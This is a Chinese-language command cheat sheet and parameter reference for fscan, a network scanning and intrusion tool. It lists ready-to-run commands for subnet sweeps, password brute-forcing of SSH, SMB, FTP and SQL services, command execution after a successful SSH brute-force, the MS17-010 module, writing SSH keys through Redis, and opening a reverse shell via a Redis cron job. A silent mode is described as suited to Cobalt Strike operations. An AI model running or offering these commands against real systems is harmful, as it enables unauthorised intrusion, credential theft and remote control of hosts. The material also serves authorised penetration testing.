常用命令
cd fscan//進入fscan文件夾
//執行在windows下為fscan.exe,linux下為./fscan
//例如
./fscan -h 192.168.101.1/24//啟動fscan並掃描網段
fscan.exe -h 192.168.x.x //默認使用全部模塊
fscan.exe -h 192.168.x.x -rf id_rsa.pub //redis 寫私鑰
fscan.exe -h 192.168.x.x -c whoami //ssh爆破成功后,命令執行
fscan.exe -h 192.168.x.x -m ms17010 //指定模塊
fscan.exe -h 192.168.x.x -m ssh -p 2222 //指定模塊ssh和端口
fscan.exe -h 192.168.x.x -h 192.168.1.1/24 //C段
fscan.exe -h 192.168.x.x -h 192.168.1.1/16 //B段
fscan.exe -h 192.168.x.x -h 192.168.1.1/8 //A段的192.x.x.1和192.x.x.254,方便快速查看網段信息
fscan.exe -h 192.168.x.x -hf ip.txt //以文件導入
完整參數
-c string
ssh命令執行
-cookie string
設置cookie
-debug int
多久沒響應,就打印當前進度(default 60)
-domain string
smb爆破模塊時,設置域名
-h string
目標ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
-hf string
讀取文件中的目標
-hn string
掃描時,要跳過的ip: -hn 192.168.1.1/24
-m string
設置掃描模式: -m ssh (default "all")
-no
掃描結果不保存到文件中
-nobr
跳過sql、ftp、ssh等的密碼爆破
-nopoc
跳過web poc掃描
-np
跳過存活探測
-num int
web poc 發包速率 (default 20)
-o string
掃描結果保存到哪 (default "result.txt")
-p string
設置掃描的端口: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
-pa string
新增需要掃描的端口,-pa 3389 (會在原有端口列表基礎上,新增該端口)
-path string
fcgi、smb romote file path
-ping
使用ping代替icmp進行存活探測
-pn string
掃描時要跳過的端口,as: -pn 445
-pocname string
指定web poc的模糊名字, -pocname weblogic
-proxy string
設置代理, -proxy http://127.0.0.1:8080
-user string
指定爆破時的用戶名
-userf string
指定爆破時的用戶名文件
-pwd string
指定爆破時的密碼
-pwdf string
指定爆破時的密碼文件
-rf string
指定redis寫公鑰用模塊的文件 (as: -rf id_rsa.pub)
-rs string
redis計划任務反彈shell的ip端口 (as: -rs 192.168.1.1:6666)
-silent
靜默掃描,適合cs掃描時不回顯
-sshkey string
ssh連接時,指定ssh私鑰
-t int
掃描線程 (default 600)
-time int
端口掃描超時時間 (default 3)
-u string
指定Url掃描
-uf string
指定Url文件掃描
-wt int
web訪問超時時間 (default 5)
